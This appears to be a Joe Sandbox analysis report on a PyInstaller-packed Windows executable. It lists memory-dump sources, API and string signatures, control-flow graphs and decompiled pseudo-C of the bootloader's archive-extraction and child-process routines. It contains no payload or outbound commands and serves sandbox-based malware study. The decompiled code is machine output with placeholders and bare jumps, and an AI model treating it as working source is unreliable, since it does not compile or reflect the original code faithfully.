                                                                                                                                                                                                                                                        0x7ff6e5ab1930
                                                                                                                                                                                                                                                        0x7ff6e5ab193b
                                                                                                                                                                                                                                                        0x7ff6e5ab1944
                                                                                                                                                                                                                                                        0x7ff6e5ab194e
                                                                                                                                                                                                                                                        0x7ff6e5ab1950
                                                                                                                                                                                                                                                        0x7ff6e5ab1958
                                                                                                                                                                                                                                                        0x7ff6e5ab195a
                                                                                                                                                                                                                                                        0x7ff6e5ab1963
                                                                                                                                                                                                                                                        0x7ff6e5ab1965
                                                                                                                                                                                                                                                        0x7ff6e5ab196d
                                                                                                                                                                                                                                                        0x7ff6e5ab1975
                                                                                                                                                                                                                                                        0x7ff6e5ab197a
                                                                                                                                                                                                                                                        0x7ff6e5ab197c
                                                                                                                                                                                                                                                        0x7ff6e5ab1981
                                                                                                                                                                                                                                                        0x7ff6e5ab198b
                                                                                                                                                                                                                                                        0x7ff6e5ab1991
                                                                                                                                                                                                                                                        0x7ff6e5ab1993
                                                                                                                                                                                                                                                        0x7ff6e5ab199c
                                                                                                                                                                                                                                                        0x7ff6e5ab19a7
                                                                                                                                                                                                                                                        0x7ff6e5ab19a9
                                                                                                                                                                                                                                                        0x7ff6e5ab19ae
                                                                                                                                                                                                                                                        0x7ff6e5ab19ca

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2153230061-4158440160
                                                                                                                                                                                                                                                        • Opcode ID: a058cc9d63babd2202232a7193b56ef5e963da3f426f41814ee04bded826b016
                                                                                                                                                                                                                                                        • Instruction ID: 789015c679e283c83b22bab7431adaf6320ada530eb0e76e6d3ced24a181ca54
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a058cc9d63babd2202232a7193b56ef5e963da3f426f41814ee04bded826b016
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8514F73B0964A86EB94EF2CD46037827A0EF48F48B514135D90DC7799DE3EE9408B8A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 53 7ff6e5ab1440-7ff6e5ab1457 call 7ff6e5ab6720 56 7ff6e5ab1462-7ff6e5ab1485 call 7ff6e5ab6a40 53->56 57 7ff6e5ab1459-7ff6e5ab1461 53->57 60 7ff6e5ab14a7-7ff6e5ab14ad 56->60 61 7ff6e5ab1487-7ff6e5ab14a2 call 7ff6e5ab24d0 56->61 63 7ff6e5ab14e0-7ff6e5ab14f4 call 7ff6e5abf934 60->63 64 7ff6e5ab14af-7ff6e5ab14ba call 7ff6e5ab3cb0 60->64 69 7ff6e5ab1635-7ff6e5ab1647 61->69 72 7ff6e5ab1516-7ff6e5ab151a 63->72 73 7ff6e5ab14f6-7ff6e5ab1511 call 7ff6e5ab24d0 63->73 70 7ff6e5ab14bf-7ff6e5ab14c5 64->70 70->63 71 7ff6e5ab14c7-7ff6e5ab14db call 7ff6e5ab2770 70->71 82 7ff6e5ab1617-7ff6e5ab161d 71->82 76 7ff6e5ab1534-7ff6e5ab1554 call 7ff6e5ac40b0 72->76 77 7ff6e5ab151c-7ff6e5ab1528 call 7ff6e5ab1050 72->77 73->82 85 7ff6e5ab1575-7ff6e5ab157b 76->85 86 7ff6e5ab1556-7ff6e5ab1570 call 7ff6e5ab24d0 76->86 83 7ff6e5ab152d-7ff6e5ab152f 77->83 87 7ff6e5ab161f call 7ff6e5abf2ac 82->87 88 7ff6e5ab162b-7ff6e5ab162e call 7ff6e5abf2ac 82->88 83->82 90 7ff6e5ab1581-7ff6e5ab1586 85->90 91 7ff6e5ab1605-7ff6e5ab1608 call 7ff6e5ac409c 85->91 99 7ff6e5ab160d-7ff6e5ab1612 86->99 97 7ff6e5ab1624 87->97 98 7ff6e5ab1633 88->98 96 7ff6e5ab1590-7ff6e5ab15b2 call 7ff6e5abf5fc 90->96 91->99 102 7ff6e5ab15b4-7ff6e5ab15cc call 7ff6e5abfd3c 96->102 103 7ff6e5ab15e5-7ff6e5ab15ec 96->103 97->88 98->69 99->82 109 7ff6e5ab15ce-7ff6e5ab15d1 102->109 110 7ff6e5ab15d5-7ff6e5ab15e3 102->110 105 7ff6e5ab15f3-7ff6e5ab15fb call 7ff6e5ab24d0 103->105 111 7ff6e5ab1600 105->111 109->96 112 7ff6e5ab15d3 109->112 110->105 111->91 112->111
                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB1440(void* __rcx, void* __rdx) {
                                                                                                                                                                                                                                                        				void* _t1;
                                                                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                                                                        				void* _t5;
                                                                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t1 = E00007FF67FF6E5AB6720(_t2, _t3, _t5, __rcx, _t9, _t10); // executed
                                                                                                                                                                                                                                                        				if (_t1 != 0xffffffff) goto 0xe5ab1462;
                                                                                                                                                                                                                                                        				return _t1;
                                                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                                                        0x7ff6e5ab144f
                                                                                                                                                                                                                                                        0x7ff6e5ab1457
                                                                                                                                                                                                                                                        0x7ff6e5ab1461

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                        • API String ID: 0-666925554
                                                                                                                                                                                                                                                        • Opcode ID: 22d906a2306998f379e7d12f439bc71ae8b2139a95c3bfc8da1a8bce80713f2e
                                                                                                                                                                                                                                                        • Instruction ID: 90b915e03297737e02c707af7988f72bffebabd88a3a99f8e411f91a967f85ba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 22d906a2306998f379e7d12f439bc71ae8b2139a95c3bfc8da1a8bce80713f2e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A851E163B0864A81EA50BB19E4307B92360AF41FD8F440131DE0DC7799EE3EEE45C78A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                                                                                                        • API String ID: 4998090-2855260032
                                                                                                                                                                                                                                                        • Opcode ID: bd17a40a22c884ade7d87aa0fec574675d56acca5ecee7ff6bf5a056ddc52e71
                                                                                                                                                                                                                                                        • Instruction ID: abb698399c467e6afc1b5a9b04d1f917fa62276ff506e042d17efba30a838deb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd17a40a22c884ade7d87aa0fec574675d56acca5ecee7ff6bf5a056ddc52e71
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A41803271C68682E790AF28E4647BA7360FF84B94F440231EA5EC66D9DF7DD904CB45
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        C-Code - Quality: 38%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB6FD0(void* __rax, long long __rbx, void* __rcx, long long _a16, short _a24, intOrPtr _a32, long long _a40, long long _a48, long long _a56, long long _a64, intOrPtr _a72, char _a80, long long _a88, short _a96, char _a104, char _a136, long long _a144, intOrPtr _a196, short _a200, long long _a216, long long _a224, long long _a232, char _a248, signed int _a8440, void* _a8480) {
                                                                                                                                                                                                                                                        				int _t47;
                                                                                                                                                                                                                                                        				signed long long _t70;
                                                                                                                                                                                                                                                        				signed long long _t71;
                                                                                                                                                                                                                                                        				long long _t72;
                                                                                                                                                                                                                                                        				long long _t73;
                                                                                                                                                                                                                                                        				long long _t96;
                                                                                                                                                                                                                                                        				void* _t97;
                                                                                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                                                                                        				void* _t101;
                                                                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                                                                        				void* _t104;
                                                                                                                                                                                                                                                        				void* _t105;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_a16 = __rbx;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABADB0(0x2110, __rax, _t104, _t105);
                                                                                                                                                                                                                                                        				_t70 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				_t71 = _t70 ^ _t98 - __rax;
                                                                                                                                                                                                                                                        				_a8440 = _t71;
                                                                                                                                                                                                                                                        				_a72 = 0;
                                                                                                                                                                                                                                                        				r8d = 0x1000;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB7A30(_t71, __rbx,  &_a248, __rcx, _t97, _t101);
                                                                                                                                                                                                                                                        				SetConsoleCtrlHandler(??, ??); // executed
                                                                                                                                                                                                                                                        				_a80 = 0x18;
                                                                                                                                                                                                                                                        				_a88 = _t96;
                                                                                                                                                                                                                                                        				_a96 = 1;
                                                                                                                                                                                                                                                        				GetStartupInfoW(??);
                                                                                                                                                                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                                                                                                                                                                        				_a144 = _t96;
                                                                                                                                                                                                                                                        				asm("movdqa [esp+0xa0], xmm0");
                                                                                                                                                                                                                                                        				_a196 = 0x101;
                                                                                                                                                                                                                                                        				_a200 = 1;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4270(0, _t71);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC6EF8(E00007FF67FF6E5AC9184(_t71, _t71), _t71);
                                                                                                                                                                                                                                                        				_t72 =  ==  ? _t96 : _t71;
                                                                                                                                                                                                                                                        				_a216 = _t72;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4270(1, _t72);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC6EF8(E00007FF67FF6E5AC9184(_t72, _t72), _t72);
                                                                                                                                                                                                                                                        				_t14 = _t96 + 2; // 0x2
                                                                                                                                                                                                                                                        				_t73 =  ==  ? _t96 : _t72;
                                                                                                                                                                                                                                                        				_a224 = _t73;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4270(_t14, _t73);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC6EF8(E00007FF67FF6E5AC9184(_t73, _t73), _t73);
                                                                                                                                                                                                                                                        				_t74 =  ==  ? _t96 : _t73;
                                                                                                                                                                                                                                                        				_a232 =  ==  ? _t96 : _t73;
                                                                                                                                                                                                                                                        				GetCommandLineW();
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				_a64 =  &_a104;
                                                                                                                                                                                                                                                        				_a56 =  &_a136;
                                                                                                                                                                                                                                                        				_a48 = _t96;
                                                                                                                                                                                                                                                        				_a40 = _t96;
                                                                                                                                                                                                                                                        				_a32 = 0;
                                                                                                                                                                                                                                                        				_a24 = 1;
                                                                                                                                                                                                                                                        				_t47 = CreateProcessW(??, ??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                        				if (_t47 == 0) goto 0xe5ab7150;
                                                                                                                                                                                                                                                        				WaitForSingleObject(??, ??);
                                                                                                                                                                                                                                                        				GetExitCodeProcess(??, ??); // executed
                                                                                                                                                                                                                                                        				goto 0xe5ab7168;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2620(_t47,  &_a136, "CreateProcessW", "Error creating child process!\n",  &_a80, _t103);
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(0xffffffff, _t44, _a8440 ^ _t98 - __rax);
                                                                                                                                                                                                                                                        			}















                                                                                                                                                                                                                                                        0x7ff6e5ab6fd0
                                                                                                                                                                                                                                                        0x7ff6e5ab6fdb
                                                                                                                                                                                                                                                        0x7ff6e5ab6fe3
                                                                                                                                                                                                                                                        0x7ff6e5ab6fea
                                                                                                                                                                                                                                                        0x7ff6e5ab6fed
                                                                                                                                                                                                                                                        0x7ff6e5ab7002
                                                                                                                                                                                                                                                        0x7ff6e5ab7006
                                                                                                                                                                                                                                                        0x7ff6e5ab700c
                                                                                                                                                                                                                                                        0x7ff6e5ab701f
                                                                                                                                                                                                                                                        0x7ff6e5ab702d
                                                                                                                                                                                                                                                        0x7ff6e5ab7035
                                                                                                                                                                                                                                                        0x7ff6e5ab703a
                                                                                                                                                                                                                                                        0x7ff6e5ab703e
                                                                                                                                                                                                                                                        0x7ff6e5ab7044
                                                                                                                                                                                                                                                        0x7ff6e5ab7047
                                                                                                                                                                                                                                                        0x7ff6e5ab7051
                                                                                                                                                                                                                                                        0x7ff6e5ab705a
                                                                                                                                                                                                                                                        0x7ff6e5ab7065
                                                                                                                                                                                                                                                        0x7ff6e5ab706d
                                                                                                                                                                                                                                                        0x7ff6e5ab707c
                                                                                                                                                                                                                                                        0x7ff6e5ab7087
                                                                                                                                                                                                                                                        0x7ff6e5ab708b
                                                                                                                                                                                                                                                        0x7ff6e5ab7093
                                                                                                                                                                                                                                                        0x7ff6e5ab70a2
                                                                                                                                                                                                                                                        0x7ff6e5ab70ab
                                                                                                                                                                                                                                                        0x7ff6e5ab70ae
                                                                                                                                                                                                                                                        0x7ff6e5ab70b2
                                                                                                                                                                                                                                                        0x7ff6e5ab70ba
                                                                                                                                                                                                                                                        0x7ff6e5ab70c9
                                                                                                                                                                                                                                                        0x7ff6e5ab70d2
                                                                                                                                                                                                                                                        0x7ff6e5ab70d6
                                                                                                                                                                                                                                                        0x7ff6e5ab70de
                                                                                                                                                                                                                                                        0x7ff6e5ab70e4
                                                                                                                                                                                                                                                        0x7ff6e5ab70fc
                                                                                                                                                                                                                                                        0x7ff6e5ab7109
                                                                                                                                                                                                                                                        0x7ff6e5ab710e
                                                                                                                                                                                                                                                        0x7ff6e5ab7113
                                                                                                                                                                                                                                                        0x7ff6e5ab7118
                                                                                                                                                                                                                                                        0x7ff6e5ab711c
                                                                                                                                                                                                                                                        0x7ff6e5ab7120
                                                                                                                                                                                                                                                        0x7ff6e5ab7128
                                                                                                                                                                                                                                                        0x7ff6e5ab7134
                                                                                                                                                                                                                                                        0x7ff6e5ab7144
                                                                                                                                                                                                                                                        0x7ff6e5ab714e
                                                                                                                                                                                                                                                        0x7ff6e5ab715e
                                                                                                                                                                                                                                                        0x7ff6e5ab7188

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                                                        • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                                                                                        • API String ID: 2895956056-3524285272
                                                                                                                                                                                                                                                        • Opcode ID: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                                                                                                                                                                                                                        • Instruction ID: 18af69ce246ba96bc4a5724c240b1a1fe9fde280f3c022b6217b3ecca5f8e1fc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 818e29d337d92c80142cd965dc47d4137e35c853672c1fb6e5a7bce6e7f526a1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6415033B0878281DB20AB68E4653AAB3A0FF94764F400335E6ADC7AD5DF7DD4448B45
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 383 7ff6e5ab1000-7ff6e5ab3686 call 7ff6e5abf080 call 7ff6e5abf078 call 7ff6e5ab7600 call 7ff6e5abf078 call 7ff6e5abadb0 call 7ff6e5ac4270 call 7ff6e5ac4f14 call 7ff6e5ab1af0 401 7ff6e5ab368c-7ff6e5ab369b call 7ff6e5ab3ba0 383->401 402 7ff6e5ab379a 383->402 401->402 407 7ff6e5ab36a1-7ff6e5ab36b4 call 7ff6e5ab3a70 401->407 404 7ff6e5ab379f-7ff6e5ab37bf call 7ff6e5abad80 402->404 407->402 411 7ff6e5ab36ba-7ff6e5ab36cd call 7ff6e5ab3b20 407->411 411->402 414 7ff6e5ab36d3-7ff6e5ab36fa call 7ff6e5ab6990 411->414 417 7ff6e5ab373c-7ff6e5ab3764 call 7ff6e5ab6f90 call 7ff6e5ab19d0 414->417 418 7ff6e5ab36fc-7ff6e5ab370b call 7ff6e5ab6990 414->418 428 7ff6e5ab384d-7ff6e5ab385e 417->428 429 7ff6e5ab376a-7ff6e5ab3780 call 7ff6e5ab19d0 417->429 418->417 423 7ff6e5ab370d-7ff6e5ab3713 418->423 425 7ff6e5ab371f-7ff6e5ab3739 call 7ff6e5ac409c call 7ff6e5ab6f90 423->425 426 7ff6e5ab3715-7ff6e5ab371d 423->426 425->417 426->425 433 7ff6e5ab3860-7ff6e5ab386a call 7ff6e5ab3280 428->433 434 7ff6e5ab3873-7ff6e5ab388b call 7ff6e5ab7a30 428->434 439 7ff6e5ab37c0-7ff6e5ab37c3 429->439 440 7ff6e5ab3782-7ff6e5ab3795 call 7ff6e5ab2770 429->440 448 7ff6e5ab386c 433->448 449 7ff6e5ab38ab-7ff6e5ab38b8 call 7ff6e5ab5e40 433->449 444 7ff6e5ab389e-7ff6e5ab38a5 SetDllDirectoryW 434->444 445 7ff6e5ab388d-7ff6e5ab3899 call 7ff6e5ab2770 434->445 439->428 447 7ff6e5ab37c9-7ff6e5ab37e0 call 7ff6e5ab3cb0 439->447 440->402 444->449 445->402 458 7ff6e5ab37e2-7ff6e5ab37e5 447->458 459 7ff6e5ab37e7-7ff6e5ab3813 call 7ff6e5ab7200 447->459 448->434 456 7ff6e5ab3906-7ff6e5ab390b call 7ff6e5ab5dc0 449->456 457 7ff6e5ab38ba-7ff6e5ab38ca call 7ff6e5ab5ae0 449->457 466 7ff6e5ab3910-7ff6e5ab3913 456->466 457->456 473 7ff6e5ab38cc-7ff6e5ab38db call 7ff6e5ab5640 457->473 462 7ff6e5ab3822-7ff6e5ab3838 call 7ff6e5ab2770 458->462 468 7ff6e5ab3815-7ff6e5ab381d call 7ff6e5abf2ac 459->468 469 7ff6e5ab383d-7ff6e5ab384b 459->469 462->402 471 7ff6e5ab3919-7ff6e5ab3926 466->471 472 7ff6e5ab39c6-7ff6e5ab39d5 call 7ff6e5ab3110 466->472 468->462 469->433 475 7ff6e5ab3930-7ff6e5ab393a 471->475 472->402 487 7ff6e5ab39db-7ff6e5ab3a12 call 7ff6e5ab6f20 call 7ff6e5ab6990 call 7ff6e5ab53e0 472->487 485 7ff6e5ab38fc-7ff6e5ab3901 call 7ff6e5ab5890 473->485 486 7ff6e5ab38dd-7ff6e5ab38e9 call 7ff6e5ab55d0 473->486 479 7ff6e5ab3943-7ff6e5ab3945 475->479 480 7ff6e5ab393c-7ff6e5ab3941 475->480 483 7ff6e5ab3991-7ff6e5ab39c1 call 7ff6e5ab3270 call 7ff6e5ab30b0 call 7ff6e5ab3260 call 7ff6e5ab5890 call 7ff6e5ab5dc0 479->483 484 7ff6e5ab3947-7ff6e5ab396a call 7ff6e5ab1b30 479->484 480->475 480->479 483->404 484->402 500 7ff6e5ab3970-7ff6e5ab397b 484->500 485->456 486->485 497 7ff6e5ab38eb-7ff6e5ab38fa call 7ff6e5ab5c90 486->497 487->402 510 7ff6e5ab3a18-7ff6e5ab3a4d call 7ff6e5ab3270 call 7ff6e5ab6fd0 call 7ff6e5ab5890 call 7ff6e5ab5dc0 487->510 497->466 501 7ff6e5ab3980-7ff6e5ab398f 500->501 501->483 501->501 523 7ff6e5ab3a4f-7ff6e5ab3a52 call 7ff6e5ab6c90 510->523 524 7ff6e5ab3a57-7ff6e5ab3a5a call 7ff6e5ab1ab0 510->524 523->524 527 7ff6e5ab3a5f-7ff6e5ab3a61 524->527 527->404
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB3BA0: GetModuleFileNameW.KERNEL32(?,00007FF6E5AB3699), ref: 00007FF6E5AB3BD1
                                                                                                                                                                                                                                                        • SetDllDirectoryW.KERNEL32 ref: 00007FF6E5AB38A5
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB6990: GetEnvironmentVariableW.KERNEL32(00007FF6E5AB36E7), ref: 00007FF6E5AB69CA
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6E5AB6990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6E5AB69E7
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                                                                                                        • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                                                                                                        • API String ID: 2344891160-3602715111
                                                                                                                                                                                                                                                        • Opcode ID: e7a6d0da6bfbeb67a5d2be4c648d60089c4e8f25429434f99f31fbb98a056aeb
                                                                                                                                                                                                                                                        • Instruction ID: 9b02c2596eef8cae894eb64e314d92d83435f5155c29530c4c305bf0273e59e0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e7a6d0da6bfbeb67a5d2be4c648d60089c4e8f25429434f99f31fbb98a056aeb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1EB19623B1C58A51EAA5BB2994703FD1750BF44F84F404136E94DC769EEE2EED04878A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%
